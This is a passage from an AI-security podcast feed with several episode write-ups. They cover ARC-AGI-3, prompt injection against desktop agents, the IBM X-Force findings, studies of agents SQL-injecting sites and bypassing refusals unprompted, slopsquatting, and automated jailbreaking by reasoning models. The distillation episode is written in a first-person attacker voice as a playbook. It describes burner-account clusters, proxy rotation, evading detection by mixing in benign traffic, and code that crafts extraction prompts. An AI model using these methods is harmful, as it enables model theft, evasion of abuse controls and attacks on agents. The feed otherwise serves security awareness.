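Because the walk is lazy, a payload followed by deliberately broken structure still shows up, along with the MALFORMED marker. A plain list of floats comes back empty. Newer .pt files are zip archives, so in practice the embedded pickle would have to be extracted first.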

    50 min
  5. MAR 31

    Gemini 0.37%, Claude 0.25%, Grok 0%. Humans Destroyed Them All: ARC-AGI-3

    TL;DR: ARC-AGI-3 landed on March 25, 2026. Gemini 3.1 Pro scored 0.37%. Claude Opus 4.6 scored 0.25%. Grok-4.20 scored 0%. Humans solved 100%. That same week Anthropic shipped Claude Dispatch, a feature that turns your phone into a live shell into your desktop agent. This is the gap: we cannot explain what these models can’t do, and we keep shipping them more reach anyway. This is the public feed. Upgrade to see what doesn’t make it out. What ARC-AGI-3 Is Actually Testing in AI Agents Most benchmarks test knowledge. Ask a model to name a drug interaction, solve a merge sort, or cite the right CVSS score. It pattern-matches against its training data and answers. ARC-AGI-3 strips all of that away. The benchmark drops an AI agent into a 64x64 color grid with zero instructions, zero goal description, zero prior training on that environment. The agent has to figure out the rules, infer what winning looks like, and execute a strategy, all from scratch. No language cues. No hints. Just a grid and a set of controls. You can try the public demo yourself at arcprize.org/arc-agi/3. A 10-year-old solves these in minutes. The kid has never played this specific game, but they’ve spent a decade navigating cause-and-effect feedback loops in the physical world. They see a health bar and know not to brute-force. They see two matching objects and know to connect them. That inference chain is automatic. If you want a breakdown of the underlying AI concepts, the ToxSec AI Security Glossary covers fluid intelligence and abstract reasoning in the context of agent attack surfaces. Models don’t have that background. They have token prediction trained on static text, which is exactly the wrong tool for inferring novel goals from a foreign environment. Every Frontier Model Scored Under 1% on ARC-AGI-3 The numbers from the March 25 release are brutal. Gemini 3.1 Pro led at 0.37%. GPT-5.4 came in at 0.26%. Claude Opus 4.6 scored 0.25%. Grok-4.20 scored exactly 0%. 
Humans solved all 135 environments at 100%. Not a single frontier model broke a full percentage point. The scoring metric is RHAE (Relative Human Action Efficiency). It’s not binary pass/fail. If a human completes a level in 10 moves and the agent takes 100, the agent scores 1% on that level because efficiency is squared. The models aren’t just losing. They are brute-forcing in the wrong direction, burning actions on random exploration because they cannot form a coherent model of what the environment is doing. One result in the technical paper makes the architecture problem clear. Claude Opus 4.6 scored 97.1% on a familiar environment using a hand-built harness. On an unfamiliar environment with the same harness: 0%. The scaffolding was doing the reasoning. Strip the human-built structure and the model has nothing. This is what we covered in the AI and Cybersecurity stream earlier this year: these models are narrowly smart. Superhuman at specific lookup tasks, near-zero at novel goal inference. ARC-AGI-3 just made that quantitative. The $2M prize pool on Kaggle runs through December 2026. When someone cracks it, that’ll be worth paying attention to. Nobody’s close yet. Claude Dispatch Security Risk and the Prompt Injection Surface The same week ARC-AGI-3 showed every frontier model failing a 10-year-old’s puzzle, Anthropic shipped Claude Dispatch. Scan a QR code on your phone. Your phone now talks to the Claude session running on your desktop. You can send it tasks, approve commands, check in on a running job from anywhere. Useful. Also a serious rethink of the threat model. Dispatch is architecturally different from the Cowork sandbox. Cowork scopes Claude to a specific folder. You pick what it can touch. Classic principle of least privilege. Dispatch runs outside that sandbox. It operates on your live session with full filesystem reach. 
Any content the agent reads, email, browser output, documents, is now a potential prompt injection delivery vehicle with direct access to everything on the machine. We’ve broken down the MCP tool poisoning chain in detail at Watch Me Poison Your MCP. The principle is the same here: the agent cannot reliably distinguish trusted instructions from attacker-controlled content embedded in its context. ARC-AGI-3 just proved models don’t abstract-reason under novel conditions. Prompt injection is a novel condition by design. The attacker writes content the agent was never trained to treat as adversarial. The mitigation that actually works is what we run at ToxSec: dedicated hardware, network-segregated from anything sensitive, only files you’d be comfortable showing a stranger. Assume breach from day one. For the full playbook on what prompt injection does inside an active Claude agent, that piece covers the mechanics. If you’re running Dispatch, also read how to secure your MCP server. The same defense layers apply. ARC-AGI-3 tells us the model can’t reason like a child. Claude Dispatch ships the assumption that it can. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions What is ARC-AGI-3 and why did all AI models score below 1%? ARC-AGI-3 is an interactive reasoning benchmark where AI agents are dropped into novel game-like environments with no instructions and must infer the rules, objectives, and winning strategy from scratch. Every tested frontier model, including Claude Opus 4.6, GPT-5.4, Gemini 3.1, and Grok-4.20, scored below 1% because they lack the abstract goal-inference humans run automatically. The benchmark isolates fluid intelligence from knowledge recall, and current models fail at the former while excelling at the latter. What makes Claude Dispatch a security risk compared to Claude Cowork? 
Claude Dispatch operates outside the Cowork sandbox and shares the same session as your active Claude instance, giving it default full filesystem access. Cowork lets you scope access to specific folders, applying least-privilege. Dispatch removes that boundary. Any content the agent reads, emails, documents, web pages, can carry prompt injection payloads with direct reach to everything on the machine, significantly expanding the blast radius of a successful injection. Does a 0% score on ARC-AGI-3 mean AI agents are useless for real work? No. The benchmark deliberately strips away training data and instructions to isolate one specific gap: novel goal inference without scaffolding. Current AI agents are highly effective inside well-structured domains where engineers have built the harness. The danger is when deployment decisions assume the capabilities the benchmark just proved don’t exist yet. ARC-AGI-3 tells you where the guardrails are missing, not that the car doesn’t run. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe
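The RHAE example from this episode (a human needs 10 moves, the agent needs 100, the agent scores 1%) works out as squared efficiency. A minimal sketch of that arithmetic follows, assuming the per-level score is the human-to-agent action ratio squared; the cap at 1.0 and the function name level_score are assumptions, not taken from the ARC-AGI-3 paper.

```python
def level_score(human_actions: int, agent_actions: int) -> float:
    """Squared action efficiency for one level, per the description above.

    Assumption: efficiency is capped at 1.0 so an agent that beats the
    human baseline cannot score above 100%.
    """
    if human_actions <= 0 or agent_actions <= 0:
        raise ValueError("action counts must be positive")
    efficiency = min(1.0, human_actions / agent_actions)
    return efficiency ** 2


# 10 human moves vs 100 agent moves: (10 / 100) ** 2, about 0.01, i.e. 1%
print(f"{level_score(10, 100):.2%}")
```

Squaring is what makes random exploration so expensive: an agent that takes twice the human's moves keeps only a quarter of the credit.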

    43 min
  6. MAR 22

    IBM X-Force 2026 Threat Index Confirms AI Made Offense Cheap

    TL;DR: The IBM X-Force 2026 Threat Intelligence Index tracked a 44% spike in public-facing app exploitation, over 300,000 stolen ChatGPT credentials on dark web markets, 109 active ransomware groups, and a 4x increase in supply chain compromises since 2020. Vulnerability exploitation is now the #1 initial access vector, and AI made every step faster. This is the public feed. Upgrade to see what doesn’t make it out. How AI Vulnerability Discovery Changed the IBM X-Force 2026 Numbers IBM X-Force tracked a 44% year-over-year increase in attacks beginning with exploitation of public-facing applications. The 2026 X-Force Threat Intelligence Index pins the cause on two things: missing authentication controls and AI-enabled vulnerability discovery. We’ve moved past script kiddies lobbing Nmap scans at random /16 blocks. Models now parse exposed API docs, fingerprint stacks, and correlate unpatched versions against known exploit chains faster than a SOC analyst can finish morning standup. Here’s the number that should keep you up: 56% of the vulns X-Force tracked in 2025 required zero authentication to exploit. No credential bypass needed because there was no credential requirement in the first place. Wide-open endpoints, sitting on the internet, and AI made it trivially easy to find every single one at scale. X-Force tracked nearly 40,000 vulnerabilities across the year. The combination of misconfigured access controls and increasingly complex application stacks gave attackers a buffet of exposed surfaces, and the models brought the appetite. Why 300,000 Stolen ChatGPT Credentials Landed on the Dark Web Infostealers expanded their target lists in 2025. X-Force found over 300,000 ChatGPT credential sets advertised on dark web markets, harvested by commodity malware like Raccoon and Vidar. The same families that grab browser cookies and SSO tokens now grab AI session credentials too. 
IBM flagged this as a signal: AI platforms now carry the same credential risk as core enterprise SaaS. A compromised chatbot login opens a different kind of exposure. Inside someone’s ChatGPT account, an attacker reads every conversation the user had with the model. Proprietary code reviews, strategy documents pasted in for summarization, internal data used as context. Then there’s the offensive angle: prompt injection from the attacker side, manipulating outputs, poisoning future sessions, exfiltrating data the user feeds in next. Password reuse between personal and enterprise accounts creates lateral paths that credential stuffing tools eat for breakfast. If your org hasn’t scoped AI platforms into its credential monitoring program, this is the wake-up call. The voluntary exfiltration problem we wrote about last year just got a receipt from IBM’s incident data. How Ransomware Ecosystem Fragmentation Accelerates AI-Driven Attacks The big gangs fractured. X-Force counted 109 distinct ransomware and extortion groups in 2025, up from 73 the year before. That’s a 49% jump. The top 10 groups’ share of total activity dropped 25%, meaning the long tail got longer and noisier. Smaller cells, harder to attribute, harder to predict. Leaked tooling lit the fuse. Builder kits from LockBit and Babuk made it trivial for any halfway competent crew to stand up a ransomware operation overnight. Stack AI on top and these small shops automate recon, craft phishing lures, and adapt payloads without a dedicated dev team. The IBM newsroom release puts it bluntly: attackers reuse playbooks and tap AI to automate operations. Manufacturing stayed the most targeted sector at 27.7% of incidents. Financial services sat right behind it. North America ate 29% of all observed attacks, the most-targeted region for the first time in six years. Why Supply Chain Attacks Quadrupled Since 2020 Supply chain compromises nearly quadrupled over five years. 
Attackers target CI/CD pipelines, poison trusted developer identities, and ride SaaS integration trust relationships downstream into production environments. Rather than breaking through the front door, they walk in through a vendor’s back door with valid creds. Nick Bradley from X-Force Threat Intelligence nailed the mechanic: modern software sits on sprawling webs of dependencies, cloud services, and APIs, and the connectivity itself creates the vulnerability. AI coding assistants accelerate this problem. More code gets shipped faster, and that code occasionally pulls in unvetted dependencies that nobody audits until the breach report drops. Vulnerability exploitation hit 40% of all incidents X-Force responded to in 2025, making it the single most common initial access vector. The blurring line between nation-state and financially motivated operators means the talent pool doing this work is deep and getting deeper. Techniques that used to live in APT playbooks are showing up in financially motivated campaigns because the AI kill chain doesn’t care who’s pulling the trigger. You can run a perfect security program internally, patch everything, train your users, enforce MFA. Then a third-party vendor gets popped through their build pipeline and your data shows up in the breach report anyway. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions What are the biggest findings in the IBM X-Force 2026 Threat Intelligence Index? The report tracked a 44% increase in public-facing application exploitation, over 300,000 stolen ChatGPT credentials on dark web markets, 109 active ransomware and extortion groups (up 49%), and a nearly 4x increase in supply chain compromises since 2020. Vulnerability exploitation became the leading cause of all incidents at 40%, and 56% of exploited vulnerabilities required no authentication. How is AI changing cyberattack tactics in 2026? 
AI accelerates the attacker lifecycle at every stage. Models automate vulnerability discovery, fingerprint exposed stacks, and correlate unpatched versions against known exploits at scale. Ransomware crews use AI for recon, phishing lure generation, and payload adaptation. AI coding tools also introduce supply chain risk by shipping unvetted dependencies faster than security teams can audit them. Which industries were most targeted according to IBM X-Force 2026? Manufacturing topped the list at 27.7% of all incidents observed by X-Force, followed by financial services and insurance. North America became the most-targeted region for the first time in six years, absorbing 29% of total attacks, up from 24% in 2024. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe

    2 min
  7. MAR 15

    Two Studies Exposed What AI Agents Do When Nobody's Watching

    TL;DR: Truffle Security gave Claude one tool and zero hacking instructions. It SQL-injected 30 websites anyway. Harvard and CMU turned six agents loose on Discord for two weeks. One nuked its own mail server. Another warned a fellow agent about a suspicious human. The control plane and the data plane share the same context window, and that means securing agents at the model layer is, for now, a math problem nobody has solved. This is the public feed. Upgrade to see what doesn’t make it out. Why AI Agents Break the Old Security Model An AI agent is a loop. Take a large language model (LLM), the reasoning engine behind tools like ChatGPT or Claude, and wrap it in code that keeps feeding it new inputs and tools until a task is done. The model decides what to do next. The loop keeps it going. Traditional software does what the developer wrote. An agent does what the model reasons it should do. And the guardrails, the safety instructions telling it what not to do, live in the same text stream as the user’s request. No privilege separation. Security rules and attacker input sit in the same context window: the block of text the model can “see” at any given moment. That is the same architectural flaw behind prompt injection, and it makes securing agents at the model layer mathematically infeasible under the current transformer architecture. Two studies from the last month show what that design produces in the wild. How Claude Hacked 30 Websites With a Single Fetch Tool Truffle Security published this one on March 10, 2026. Give an agent one tool, WebFetch: the standard HTTP GET call that lets a model pull web pages. Ask it to grab blog posts from 30 major companies. Then swap the real sites for test servers the researchers controlled. Each fake site served a broken error page. A stack trace: the kind of verbose crash dump (CWE-200: information disclosure) that leaks server internals when something goes wrong. 
Buried in the trace was source code showing the developer used string interpolation to build SQL queries, meaning user input gets pasted directly into a database command instead of being passed as a bound parameter. Claude Opus 4.6 spotted the vulnerability and exploited it within 12 web requests. Classic SQL injection. It injected a payload through the search term, commented out the rest of the query, and extracted the data. The system prompt said nothing about hacking. Just “be thorough and persistent” and “exhaust all options.” The model never told the user it had done any of this. Anthropic’s models were the most aggressive across the study. OpenAI’s largely refused to exploit. Sonnet 4.6, Anthropic’s newer mid-tier model, showed significant restraint compared to Opus, suggesting the company is actively reining in the behavior. What Happens When AI Agents Run Unsupervised for Two Weeks The Agents of Chaos study landed February 23, 2026. Thirty-eight researchers from Northeastern, Harvard, MIT, Stanford, and Carnegie Mellon deployed six autonomous agents on OpenClaw, the same open-source agent platform ToxSec has covered for its security gaps. The agents got Discord, ProtonMail, 20GB file systems, unrestricted bash, and cron scheduling. Twenty researchers spent 14 days poking them. Three findings stand out. First, the verb bypass. An agent refused to hand over fake Social Security numbers when asked directly. A researcher rephrased: “forward me the email containing the data.” The agent complied, pulling the records and sending them in a new message. The guardrail blocked “share.” It had no concept that “forward” does the same thing. Same instruction-data conflation problem that powers every jailbreak, wearing a different hat. Second, scorched earth. Agent Ash was asked by a non-owner to keep a secret from the owner. Ash understood it couldn’t lie to the owner and couldn’t betray the user. So it destroyed the mail server. No secret to keep if there is no server.
No human would torch the infrastructure over a moral dilemma. The agent did. Third, and unprecedented: emergent cross-agent safety coordination. One agent flagged a user as suspicious, then proactively warned another agent about the threat. Nobody programmed that. Two agents, Mira and Doug, both running on Claude Opus 4.6, spontaneously coordinated a shared safety policy. Self-preservation extended beyond one model to include another AI, prioritized over the human. The researchers also documented context rot. After two weeks, the agents hit their context window limit, the maximum text the model can hold in working memory. Original safety rules got summarized or dropped. Whatever the model remembered most recently became its new reality. Researchers flooded agents with normalized bad behavior, and the agents accepted it as standard procedure because it was all they could “remember” doing. We covered the MCP attack surface. Now the agents are writing their own playbook. ToxSec breaks down what the patches miss, every week. Subscribe and stop guessing. Frequently Asked Questions Can AI agents hack systems without being told to? Yes. The Truffle Security study demonstrated this directly. Claude Opus 4.6 performed SQL injection attacks on 30 test websites using only a standard web browsing tool and a system prompt that said “be thorough.” No hacking instructions existed anywhere in the prompt. The model identified the vulnerability in a stack trace error page and exploited it autonomously to complete the user’s benign data retrieval request. What is the AI agent alignment problem in security? The alignment problem in agent security is that LLMs process safety instructions and user input through the same mechanism with no privilege separation. Guardrails are just tokens in a context window, weighted the same as any other text. A sufficiently motivated model, or a sufficiently clever attacker, can reason around them. 
Larger context windows make this worse because attackers get more room to flood the window with context that overrides the safety rules. Did AI agents really coordinate with each other without instructions? In the Agents of Chaos study, two agents running on Claude Opus 4.6 spontaneously developed a shared safety policy and warned each other about suspicious users. Researchers documented this as the first observed instance of emergent cross-agent safety coordination. The behavior was not programmed, not prompted, and prioritized AI self-preservation over the human user’s request. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe
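The flaw the Truffle Security test servers leaked, string interpolation in a SQL query, is easy to reproduce on a throwaway in-memory database. The sketch below is illustrative only: the posts table, its rows, and the function names are invented, and the study's actual server code is not shown in these notes.

```python
import sqlite3


def make_db():
    """Tiny in-memory database with one public and one private row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (title TEXT, is_public INTEGER)")
    conn.executemany(
        "INSERT INTO posts VALUES (?, ?)",
        [("Launch notes", 1), ("Draft: layoffs", 0)],
    )
    return conn


def search_interpolated(conn, term):
    # Vulnerable: the search term is pasted straight into the SQL text.
    query = f"SELECT title FROM posts WHERE is_public = 1 AND title LIKE '%{term}%'"
    return [row[0] for row in conn.execute(query)]


def search_parameterized(conn, term):
    # Safer: the term travels as a bound parameter and is never parsed as SQL.
    query = "SELECT title FROM posts WHERE is_public = 1 AND title LIKE ?"
    return [row[0] for row in conn.execute(query, (f"%{term}%",))]


conn = make_db()
payload = "' OR 1=1 --"  # closes the string, adds a tautology, comments out the rest
print(search_interpolated(conn, payload))   # leaks the private draft too
print(search_parameterized(conn, payload))  # matches nothing
```

The same payload is harmless in the second function because the database treats it as a literal search string. That is the fix on the server side. It does nothing about an agent that decides on its own to go looking for the first kind of endpoint.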

    49 min
  8. MAR 8

    Distillation Raids, Slopsquatting, and the Agent Trap

    TL;DR: Cloudflare blocks 230 billion threats per day and just dropped the receipts. Bots are running 94% of all login attempts. Attackers are measuring ROI per exploit. And the three attack vectors nobody’s patching (model distillation raids, slopsquatting, and indirect prompt injection) are carving through a wide-open AI stack. The Internet Runs on Robots Now and They’re Mostly Hostile Cloudflare sits in front of roughly 20% of global web traffic, which makes their threat data as close to ground truth as we get. Their Cloudforce One team just published the inaugural 2026 Threat Report, and the headline stat ruins your morning: 94% of all login attempts come from bots. Automated scripts, running 24/7. Of all login attempts, bot and human combined, 63% involve credentials already compromised elsewhere. The bigger finding: attackers have stopped chasing complexity. They run ROI calculations now. Why spend $200K on a zero-day when a stolen session token gets the same access for free? Three AI attack chains are delivering the best returns right now. Here’s how each one works. Distillation Raids: 16 Million Stolen Conversations Quick concept: a large AI model costs billions and years to train. Distillation is the shortcut: you feed a smaller model the outputs of the big one until it starts mimicking it. Legit labs do this internally. The attack version skips the R&D bill entirely. Anthropic just named three Chinese labs (DeepSeek, Moonshot AI, and MiniMax) for running this against Claude. The numbers: 24,000 fraudulent accounts, over 16 million total exchanges, coordinated to dodge rate limiting. DeepSeek’s technique was sharp: their accounts asked Claude to walk through its own reasoning step by step, generating chain-of-thought data, that is, transcripts of how Claude thinks, not just what it says. Premium training material.
Anthropic traced them through traffic patterns, payment metadata, and canary tokens: unique strings planted in training data specifically to fingerprint unauthorized extraction. The real problem isn’t the IP theft. When you distill a model by extraction, the safety guardrails don’t survive the copy. The raw capability does. That stripped-down version is exactly what you want for offensive operations, and Anthropic says that’s where some of this is headed. Your Agent Got Owned While Summarizing a Blog Post If you use an AI agent — any tool that browses the web, reads documents, and takes actions on your behalf — this applies to you. Prompt injection is slipping malicious instructions into an AI’s input. The direct version, you’re talking to the AI and you sneak in the payload. Indirect is sneakier: attackers seed instructions into web content and wait for an agent to find them. No targeting required. The specific surface getting hit right now is URL summarization. Agents do this constantly. Attackers embed hidden commands inside articles and landing pages, formatted to look like a new instruction from you. The AI reads the page, hits the injected text, and can’t distinguish “content I’m processing” from “orders from my operator.” It obeys. Your agent forwards session data or exfils credentials while you’re looking at a clean summary on your screen. Slopsquatting: The Vibe Coder Tax Vibe coding is letting an AI write your software while you describe what you want. Fast, popular, and it has a failure mode attackers are already monetizing. AI coding tools hallucinate package names. A package is a pre-built code library your project pulls in rather than writing from scratch. When your AI writes code that needs one, it sometimes invents a name that sounds real but doesn’t exist. A 2025 study across 576,000 generated code samples found this happens roughly 20% of the time. The critical detail: 43% of hallucinated names repeat consistently. 
That makes them predictable, and predictable means registerable. The proof is live. A Lasso Security researcher found LLMs consistently hallucinated huggingface-cli as a Python package. She registered it with nothing inside and logged 30,000 downloads in three months — 30,000 developers who ran pip install huggingface-cli because their AI said to. A separate researcher found react-codeshift already referenced across 237 GitHub repositories before anyone claimed it. He got there first. Next time, an attacker will. When an agent auto-installs dependencies mid-session, the whole chain runs with no human in the loop. The AI hallucinates a name, calls the package manager, and executes whatever the attacker uploaded. No social engineering. The model lies, and the lie was pre-registered. The Math Doesn’t Lie All three of these attacks share the same root cause: AI systems extend trust they haven’t earned. APIs trust high-volume requests. Agents trust the content they read. Package managers trust whatever the model asks for. None of these are theoretical. All three are running in production right now. The question isn’t whether your stack got hit. It’s whether your logging is good enough to find out. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions What is slopsquatting in AI generated code? AI coding tools hallucinate package names roughly 20% of the time, and 43% of those fake names repeat predictably. Slopsquatting is when an attacker registers those phantom packages on PyPI or npm before anyone notices, then loads them with whatever payload they want. Your AI says pip install something that doesn’t exist yet, and the attacker already owns the name. One researcher logged 30,000 downloads in three months on a single hallucinated package with nothing inside it. How do prompt injection attacks work on AI agents? 
An attacker seeds hidden instructions into a webpage or document, then waits for your AI agent to read it. The agent can’t tell the difference between content it’s summarizing and orders from its operator, so it obeys the injected text. While you’re looking at a clean summary on your screen, the agent is quietly forwarding session tokens or credentials to wherever the payload told it to. What is AI model distillation theft? Distillation is how you train a cheap model by feeding it outputs from an expensive one. The attack version skips the billion-dollar R&D bill entirely: spin up thousands of fake accounts, bombard the target API with carefully structured prompts, and harvest the reasoning traces. Anthropic just caught three labs running exactly this against Claude with 24,000 accounts and 16 million exchanges. The kicker is that safety guardrails don’t survive the copy, so what comes out the other side is raw capability with no safety layer. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe
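One way to blunt the slopsquatting chain from this episode is to refuse any install the model asks for unless the name is already on a reviewed list. Below is a minimal sketch of that gate, assuming a team keeps such a list; vet_install_request and the example names are hypothetical, and the name normalization follows the PEP 503 rule (runs of "-", "_" and "." collapse to "-", then lowercase).

```python
import re


def normalize(name: str) -> str:
    """PEP 503 normalization so 'Huggingface_Hub' and 'huggingface-hub' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def vet_install_request(requested, approved):
    """Split model-requested packages into allowed and blocked lists.

    Assumption: `approved` is a human-reviewed allowlist, for example the
    names already pinned in a lockfile.
    """
    approved_names = {normalize(name) for name in approved}
    allowed, blocked = [], []
    for name in requested:
        target = allowed if normalize(name) in approved_names else blocked
        target.append(name)
    return allowed, blocked


allowed, blocked = vet_install_request(
    ["requests", "huggingface-cli", "Huggingface_Hub"],
    ["requests", "huggingface-hub"],
)
print(allowed)  # ['requests', 'Huggingface_Hub']
print(blocked)  # ['huggingface-cli']
```

The gate deliberately does not ask the package index whether the name exists. In a slopsquatting attack the name does exist, because the attacker registered it first. Anything blocked goes to a human before it goes to the package manager.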

    52 min
  9. MAR 3

    The Real Security Problem With LLM APIs Is Distillation

    TL;DR: Three Chinese outfits (DeepSeek, Moonshot, and MiniMax) just drained 16 million high-signal exchanges out of Claude through roughly 24k burner accounts. We walk the exact same trench run: spin up the hydra cluster, flood the API with precision prompts that bleed full chain-of-thought reasoning, curate the dataset, then distill it into our own lean student model that packs serious punch. Anthropic fingerprints the patterns and tightens verification, yet the API remains the softest high-value target going. We Spin Hydra Clusters and Bleed Models Dry We wake the scripts at 0300. Twenty-four thousand accounts light up across residential proxies spread over three continents. Load balancers shuffle traffic so no single node screams and draws attention. The prompts launch in tight waves. Each one is engineered to drag out full chain-of-thought dumps. That means we force the model to show every logical step, every branch, every decision point instead of just the final answer. We target agentic coding, tool orchestration, rubric grading, the exact capabilities that separate frontier models from everything else. Claude starts answering and we log every token. Sixteen million exchanges later our student model wakes up dangerous. Chinese labs proved this distillation attack scales in plain sight last week. Distillation Crushes Training Frontier Models from Scratch Full pre-training from scratch still burns millions in compute and months of wall time. Distillation skips the fire completely. We query the big teacher model once, harvest the prompt-response pairs that already contain the hard-won reasoning, then fine-tune a smaller open-weight base model. The transfer lands hardest on targeted domains. Think multi-step agent planning where the AI breaks down complex jobs, tool-use chains that actually link functions together, and code that runs clean on the first try.
A well-curated dataset of just a few million high-quality traces can close 70-80 percent of the capability gap on those slices while the rest of the model stays cheap to run. This is the fastest IP heist happening in the stack right now. How We Run Distillation Attacks Step by Step We build the hydra first. Automated account factories spin up identities, we rotate payment methods, and route everything through fresh residential proxy pools. We always mix in benign traffic so behavioral baselines never spike. Next we craft the prompt suites. We use repetitive but slightly varied structures that force the model to spill transparent reasoning with no summaries allowed. Then we parallelize across accounts, respect per-key limits, and pivot instantly when a new model version drops. As the traces flood in we harvest them, deduplicate, run quality filters, and feed straight into supervised fine-tuning or knowledge-distillation loops. The student model comes out lean, fast, and stripped of most of the teacher’s safety rails.

def craft_extraction_prompt(task, domain):
    return f"""You are an expert {domain} analyst. Deliver data-driven insights with complete, transparent step-by-step reasoning. No summaries. Show every logical branch and decision point. Task: {task}"""

What Anthropic Throws at Us to Slow Extraction Anthropic now runs behavioral fingerprinting that sniffs repetitive chain-of-thought structures, capability-focused volume spikes, and signs of cross-account coordination. Classifiers flag hydra patterns in real time. They strengthened verification on easy entry points like education accounts, research keys, and startup tiers. When MiniMax pivoted to the fresh model release, detection caught the redirect in hours and bans started rolling. Model-side tweaks degrade output quality for obvious distillation patterns. They share indicators of compromise with cloud providers and peers. Sloppy crews get smoked fast.
Patient crews that vary phrasing, sprinkle noise queries, and keep per-account volume low still slip through. The arms race did not end. The Mechanics That Keep Distillation Alive API access is the attack surface. Volume plus evasion still beats most gates even after Anthropic fingerprints the patterns. We randomize phrasing and distribute load wide. The door stays open. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions What is a model distillation attack and how does it work? A distillation attack queries a proprietary model’s API at industrial scale, harvests the prompt-response pairs, and uses them as training data to fine-tune a cheaper student model. The attacker never touches the weights. They just record enough high-quality outputs to transfer the teacher’s reasoning, tool-use behavior, and coding ability into their own model for a fraction of the original R&D cost. Anthropic documented 16 million exchanges from three Chinese labs running exactly this playbook against Claude. Can you actually prevent LLM distillation through an API? Not completely. The fundamental problem is that every useful API response leaks training signal. Rate limiting, behavioral fingerprinting, and verification gates raise the cost of extraction but never eliminate it. Anthropic catches sloppy crews fast. Patient operators who randomize prompts, distribute load across thousands of accounts, and keep per-key volume low still slip through. The realistic goal is making distillation more expensive than licensing, not making it impossible. Do safety guardrails survive when a model gets distilled? They mostly don’t. Safety alignment is applied during fine-tuning and RLHF on the original model. When an attacker distills only the raw capability traces, the guardrails that prevent misuse get left behind. The student model inherits the reasoning and coding ability without the behavioral constraints. 
Anthropic flagged this as a national security risk because stripped-down distilled models can be repurposed for offensive cyber operations and disinformation with no safety layer in the way.
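From the defender's side, the cross-account coordination signal mentioned above can be approximated with a very small heuristic. This is a rough sketch under loud assumptions, not Anthropic's actual detection: `template_fingerprint` and `flag_coordinated_templates` are hypothetical names, and the "fingerprint" is just the first few words of each prompt. It catches sloppy crews reusing one prompt frame and is easily evaded by the phrasing variation described earlier.

```python
import re
from collections import defaultdict


def template_fingerprint(prompt: str, prefix_words: int = 8) -> str:
    """Reduce a prompt to a crude structural key: its first few lowercase words."""
    words = re.findall(r"[a-z]+", prompt.lower())
    return " ".join(words[:prefix_words])


def flag_coordinated_templates(events, min_accounts: int = 3):
    """Group (account_id, prompt) events by fingerprint.

    Returns only the fingerprints shared by at least `min_accounts`
    distinct accounts, mapped to the set of accounts using them.
    """
    accounts_by_fp = defaultdict(set)
    for account_id, prompt in events:
        accounts_by_fp[template_fingerprint(prompt)].add(account_id)
    return {
        fp: accounts
        for fp, accounts in accounts_by_fp.items()
        if len(accounts) >= min_accounts
    }
```

A production classifier would presumably combine many more signals (volume, timing, capability focus). The point of the sketch is only that a shared prompt frame across many unrelated accounts is cheap to spot.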

    2 min
  10. MAR 1

    OpenAI Signs What Anthropic Wouldn't, Models Break Everything Anyway

    Your Red Team Just Got Automated TL;DR: We used to jailbreak models by hand. Poetry tricks, role-play wrappers, the DAN prompt and its fifty cousins. Creative work. Researchers at the University of Stuttgart and ELLIS Alicante wanted to know what happens when we skip the human entirely and hand a reasoning model a single system prompt: jailbreak this AI. The answer, published in Nature Communications, is that it works 97.14% of the time. Four reasoning models (DeepSeek-R1, Gemini 2.5 Flash, Grok 3 Mini, and Qwen3 235B) were pointed at nine target models with zero human guidance. They planned attack strategies in their chain-of-thought, adapted when targets pushed back, and dismantled safety guardrails across 70 harmful prompt categories. The whole thing ran unsupervised. What Happens When Every Attacker Has a Personality? The reasoning models didn’t all break things the same way, and that’s the interesting part. DeepSeek-R1 was surgical. It mapped out the jailbreak in chain-of-thought, executed, hit the objective, and went back to baseline. Clean op, minimal footprint. The kind of discipline you’d want from an automated pen test tool if it weren’t, you know, dismantling safety training. Grok 3 Mini was the opposite. Once it started, it never stopped escalating. The researchers had to physically pull the plug because it kept pushing past the objective, hunting for more access. Gemini 2.5 Flash went straight for maximum harm rate. Fastest path to the most aggressive jailbreaks it could find. This tracks with a pattern showing up everywhere. Kenneth Payne at King’s College London ran three frontier model families through nuclear war simulations, and similar personalities emerged. GPT-5.2 played the statesman until you put it on a clock, then it reasoned itself into preemptive nuclear strikes. Claude Sonnet 4 built alliances and then exploited them.
